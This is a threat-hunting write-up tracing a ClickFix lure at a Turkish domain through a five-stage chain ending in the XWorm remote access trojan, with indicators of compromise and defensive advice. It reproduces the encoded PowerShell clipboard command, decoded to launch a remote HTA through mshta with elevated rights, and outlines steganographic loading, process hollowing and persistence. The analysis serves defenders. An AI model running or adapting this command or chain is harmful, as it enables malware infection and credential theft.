Modern malware delivery has shifted heavily toward web-based mechanisms. Unlike traditional payload delivery, web infrastructure gives attackers flexibility and control. Payloads can change dynamically depending on the visitor, infrastructure can rotate without rebuilding campaigns, and attackers can track victims using analytics techniques borrowed directly from marketing playbooks.
Most importantly, attackers can fingerprint environments—identifying researchers or sandboxes—and selectively deliver payloads.
All of this activity surfaces in one place: the HTTP response body. While this layer is incredibly noisy, it also contains the most valuable signals for identifying modern threats.
Technique-Based Hunting vs Traditional Methods
There are two common approaches to hunting malicious web infrastructure.
The first is topical hunting, which focuses on keywords such as banking, shipping, or tax-related themes. This is effective for phishing campaigns that mimic known brands.
The second, and more powerful approach used here, is technique-based hunting. Instead of focusing on what a page says, it focuses on what the page does. This includes behavioral indicators like PowerShell execution, obfuscation patterns, clipboard manipulation, and encoded payloads.
By shifting focus to attacker behavior, defenders can identify threats that would otherwise evade keyword-based detection.
Building a Strong Detection Signal
The core of this hunt relied on combining two key signals. The first signal was the presence of PowerShell references in HTTP response bodies. On its own, this produces thousands of benign results such as tutorials and documentation.
The second signal introduced obfuscation indicators. These included base64 decoding functions, JavaScript obfuscation patterns, encoded PowerShell commands, and clipboard API usage. By combining these two signals using logical AND conditions, the dataset was dramatically reduced. This ensured that only pages exhibiting both execution intent and obfuscation techniques were returned.
To further refine the results, known malicious infrastructure already flagged by Censys was excluded. This allowed the hunt to focus purely on previously undiscovered threats.
Eliminating Noise at Scale
Even with strong signals, noise remains a major challenge. Legitimate websites frequently include similar patterns, especially developer blogs or platforms with interactive code snippets.
To solve this, a three-layer negation strategy was applied.
The first layer removed known-good platforms such as cloud providers, SaaS platforms, and major web services. The second layer filtered out irrelevant HTTP status codes like redirects and error pages. The third layer introduced a large multilingual exclusion list targeting default server pages, parked domains, and maintenance templates.
This aggressive filtering reduced the dataset to just 42 results—small enough to analyze effectively.
Using Clustering to Identify Campaigns
Instead of reviewing each result individually, the data was grouped by HTTP body hash. This allowed identical pages to be clustered together, revealing patterns of reuse across infrastructure.
Most results turned out to be noise. However, one cluster stood out: six identical pages hosted across subdomains of orcanmedikal[.]com[.]tr.
These pages presented a fake “AntiFraud Authenticator” interface—a classic ClickFix lure designed to trick users into executing malicious commands.
Inside the Attack Chain
The attack unfolds in five distinct stages, each carefully designed to evade detection.
The first stage is social engineering. Users are prompted to copy a “security code,” which is actually a PowerShell command placed into their clipboard.
powershell -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAG0AcwBoAHQAYQAuAGUAeABlACAAaAB0AHQAcABzADoALwAvAG8AcgBjAGEAbgBtAGUAZABpAGsAYQBsAC4AYwBvAG0ALgB0AHIALwB0AG8AbwBsAC4AaAB0AGEAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMADecoded (UTF-16LE): Start-Process mshta.exe hxxps://orcanmedikal[.]com[.]tr/tool[.]hta -Verb RunAs
The second stage executes an HTA file using mshta.exe with elevated privileges. This script is heavily obfuscated using Unicode characters and decoy code to confuse analysis tools.
HTA execution (tool.hta)
| Unicode emoji obfuscation (two different separator patterns)
| passman() regex strips separators to recover base64 + PowerShell command
| WScript.Shell.Run(cmd, 0, false) (hidden execution)
| Decoy AES-JS library inflates file to confuse static analysis
The third stage retrieves a hidden payload from a JPEG file hosted on archive[.]org. The malware is embedded using steganography between specific markers.
| PowerShell downloads JPEG from archive[.]org (now removed/darked)
| Extracts base64 between BaseStart-/BaseEnd markers in image data
| Reflectively loads .NET assembly: ClassLibrary1.Home.VAI()
The fourth stage loads the PhantomVAI loader, which performs environment checks, downloads the next payload, and injects it into a legitimate process using process hollowing.
| VM detection (VirtualBox, VMware, VirtualPC)
| Downloads payload from hxxps://4a-m[.]al/ConvertedFile[.]txt
| Payload is reversed and base64-encoded; loader reverses string then base64-decodes
| Process hollowing via RUNPE into RegAsm.exe
| Persistence via scheduled task + startup registry
Finally, the fifth stage delivers XWorm V5.6, a full-featured remote access trojan capable of credential theft, surveillance, and system control.
C2: 86.106.85[.]194:9000
Campaign: “XWorm V5.6”
Mutex: UGUHrsQaOFvrEntr
Notable Indicators of Compromise (IOCs)
Several high-confidence indicators emerged from this investigation:
- Domain: orcanmedikal[.]com[.]tr
- Payload staging: 4a-m[.]al
- C2 server: 86.106.85[.]194:9000
- Mutex: UGUHrsQaOFvrEntr
- LOLBins: mshta.exe, RegAsm.exe
- File hashes and artifacts across all five stages
These indicators provide actionable intelligence for both detection and threat hunting teams.
Defensive Takeaways
This campaign highlights how attackers combine simple techniques—like base64 encoding and string reversal—with advanced delivery methods such as steganography and process injection.
For defenders, this means traditional signature-based detection is no longer sufficient. Monitoring behavioral indicators is critical. This includes tracking unusual PowerShell execution, suspicious use of system binaries, and clipboard manipulation in web content.
Network monitoring should also focus on suspicious outbound connections, especially to known staging domains and uncommon ports.
Our Perspective on This Case
What makes this campaign particularly interesting is not just its sophistication, but its practicality. None of the individual techniques used are groundbreaking. In fact, many of them—like base64 encoding, LOLBins, and simple obfuscation—are well known and widely documented.
However, the real strength lies in how these techniques are combined. Each stage of the attack appears relatively benign in isolation. A JPEG file, a PowerShell command, or a system binary execution might not raise immediate alarms. But when chained together, they create a highly effective and stealthy attack flow.
This reflects a broader trend in modern cyber threats. Attackers are moving away from complex, easily detectable malware toward modular, layered approaches that blend into normal system behavior.
Another key takeaway is the importance of technique-based hunting. Traditional keyword or signature-based detection would likely miss this campaign entirely. By focusing on behavioral patterns instead, defenders can uncover threats that are still under the radar.
Finally, this case reinforces the need for proactive threat hunting. Waiting for alerts is no longer enough. Organizations must actively search for suspicious patterns within their environments to stay ahead of evolving threats.
In short, this campaign is a strong reminder that effective defense today requires both technical depth and strategic thinking.
